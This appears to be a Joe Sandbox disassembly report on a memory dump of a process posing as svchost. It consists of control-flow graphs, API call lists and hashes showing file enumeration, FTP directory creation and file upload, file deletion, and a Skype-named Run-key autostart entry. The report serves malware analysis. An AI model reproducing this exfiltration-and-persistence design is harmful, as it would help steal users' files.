??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 358->363 359->353 364 6728da-672a06 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 359->364 390 67333d-67334b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 362->390 363->362 363->363 364->353 371 672d53-672dff ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 365->371 372 672d1e 365->372 369 672b12 366->369 370 67336d-67336f 366->370 369->355 370->350 375 673375-673394 memset 370->375 377 672e01-672e16 fgetc 371->377 376 672d20-672d51 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 372->376 379 673396 375->379 380 6733be-67342c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 RegOpenKeyExA RegSetValueExA RegCloseKey 375->380 376->371 376->376 381 672e27-672e36 377->381 382 672e18-672e24 fputc 377->382 384 6733a0-6733bc ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 379->384 380->350 395 673432-6734da ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z memset ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z CreateProcessA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 380->395 386 672fa6-672fa9 381->386 387 672e3c-672ebf ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 fclose ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 381->387 382->381 384->380 384->384 386->377 389 672faf-672fcd fclose * 2 386->389 396 672ef4-672fa3 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 387->396 397 672ec1-672ef2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 387->397 393 673336 389->393 394 672fd3-67304e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 389->394 390->366 393->390 398 673083-673171 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 394->398 399 673050-673081 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 394->399 395->350 396->386 397->396 397->397 402 6731a6-673247 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 3 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 398->402 403 673173-6731a4 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 398->403 399->398 399->399 404 673283-673330 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 FtpPutFileA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 402->404 405 673249 402->405 403->402 403->403 404->393 404->394 407 673250-673281 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 405->407 407->404 407->407
      APIs
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000), ref: 006725D2
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,00000000), ref: 006725E8
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000), ref: 00672605
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,00000000), ref: 00672612
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?), ref: 0067263B
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 00672659
      • FindFirstFileA.KERNEL32(00000000), ref: 00672660
      • FindNextFileA.KERNEL32(00000000,?), ref: 00672675
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?), ref: 006726B6
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00000000,0067660C), ref: 006726CE
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90 ref: 006726E3
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006726F8
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067270D
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?), ref: 00672724
      • FindFirstFileA.KERNEL32(00000000), ref: 0067272B
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?), ref: 00672775
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?,00000000,00676378), ref: 0067278D
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00000000,?,?,?,?,00000000,00676378), ref: 006727A8
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??$?D@1@@std@@D@2@@0@V10@V?$basic_string@$A?$basic_string@FileFind$??1?$basic_string@?erase@?$basic_string@FirstV12@$??0?$basic_string@??4?$basic_string@NextV01@V01@@
      • String ID: $ $%s\%s$-$Skype$Software\Microsoft\Windows\CurrentVersion\Run\$\skype$a$m$v_%d
      • API String ID: 3591687450-3013915691
      • Opcode ID: d5925c10f9df1b04084d90a755481bb2dd224fd5b72042bd3a28ca054a3b828b
      • Instruction ID: cb0b6d9111ce47902fd42ed1d0c331ccbc128c5593b441452df51614f9159b64
      • Opcode Fuzzy Hash: d5925c10f9df1b04084d90a755481bb2dd224fd5b72042bd3a28ca054a3b828b
      • Instruction Fuzzy Hash: 2B226A711087819FD738DB64DD59BEE7BAABB94305F00990CF58E822A1EB705588CF62

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 409 672687-67268e 410 672690-672698 409->410 411 672a20-672a35 FindNextFileA 410->411 412 67269e-67273b ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 2 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FindFirstFileA 410->412 411->410 413 672a3b-672b01 FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf call 671260 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA 411->413 414 672741-672749 412->414 415 67288e-67289f FindNextFileA 412->415 432 672b07-672b10 413->432 433 6734e0-67355a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 4 call 674bfc 413->433 414->415 417 67274f-672757 414->417 415->411 418 6728a5 415->418 417->415 420 67275d-67288b ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 417->420 421 6728b0-6728b8 418->421 420->415 422 6728be-6728c6 421->422 423 672a09-672a1a FindNextFileA 421->423 422->423 426 6728cc-6728d4 422->426 423->411 423->421 426->423 429 6728da-672a06 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 426->429 429->423 435 672b18-672b29 432->435 437 672c93-672cbb ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 435->437 438 672b2f-672b9f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 3 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 435->438 442 672cc1-672d1c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 437->442 443 67334f-673367 437->443 440 672bd4-672c8e ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 FtpPutFileA 438->440 441 672ba1-672bd2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 438->441 465 67333d-67334b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 440->465 441->440 441->441 447 672d53-672dff ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 442->447 448 672d1e 442->448 445 672b12 443->445 446 67336d-67336f 443->446 445->435 446->433 450 673375-673394 memset 446->450 452 672e01-672e16 fgetc 447->452 451 672d20-672d51 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 448->451 454 673396 450->454 455 6733be-67342c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 RegOpenKeyExA RegSetValueExA RegCloseKey 450->455 451->447 451->451 456 672e27-672e36 452->456 457 672e18-672e24 fputc 452->457 459 6733a0-6733bc ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 454->459 455->433 470 673432-6734da ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z memset ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z CreateProcessA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 455->470 461 672fa6-672fa9 456->461 462 672e3c-672ebf ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 fclose ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 456->462 457->456 459->455 459->459 461->452 464 672faf-672fcd fclose * 2 461->464 471 672ef4-672fa3 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 462->471 472 672ec1-672ef2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 462->472 468 673336 464->468 469 672fd3-67304e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 464->469 465->443 468->465 473 673083-673171 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 469->473 474 673050-673081 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 469->474 470->433 471->461 472->471 472->472 477 6731a6-673247 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 3 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 473->477 478 673173-6731a4 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 473->478 474->473 474->474 479 673283-673330 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 FtpPutFileA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 477->479 480 673249 477->480 478->477 478->478 479->468 479->469 482 673250-673281 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 480->482 482->479 482->482
      APIs
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?), ref: 006726B6
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00000000,0067660C), ref: 006726CE
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90 ref: 006726E3
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006726F8
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067270D
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?), ref: 00672724
      • FindFirstFileA.KERNEL32(00000000), ref: 0067272B
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?), ref: 00672775
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?,00000000,00676378), ref: 0067278D
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00000000,?,?,?,?,00000000,00676378), ref: 006727A8
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(00000000), ref: 006727CB
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006727E0
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006727F5
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067280A
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 0067282D
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 00672850
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(?), ref: 00672880
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?,AED9119B,00000000,00675699,000000FF,00672550,?,?,?,AED9119B), ref: 00671322
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676268,?,?,?,AED9119B), ref: 00671332
        • Part of subcall function 006712F0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,AED9119B), ref: 0067133F
        • Part of subcall function 006712F0: SendMessageA.USER32(00010404,0000000C,00000000,00000000), ref: 00671351
        • Part of subcall function 006712F0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,AED9119B), ref: 00671363
      • FindNextFileA.KERNEL32(00000000,?), ref: 00672897
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?), ref: 006728F2
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?,00000000,00676378), ref: 0067290A
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00000000,?,?,?,?,00000000,00676378), ref: 00672924
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(00000000), ref: 00672947
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067295B
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672970
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672985
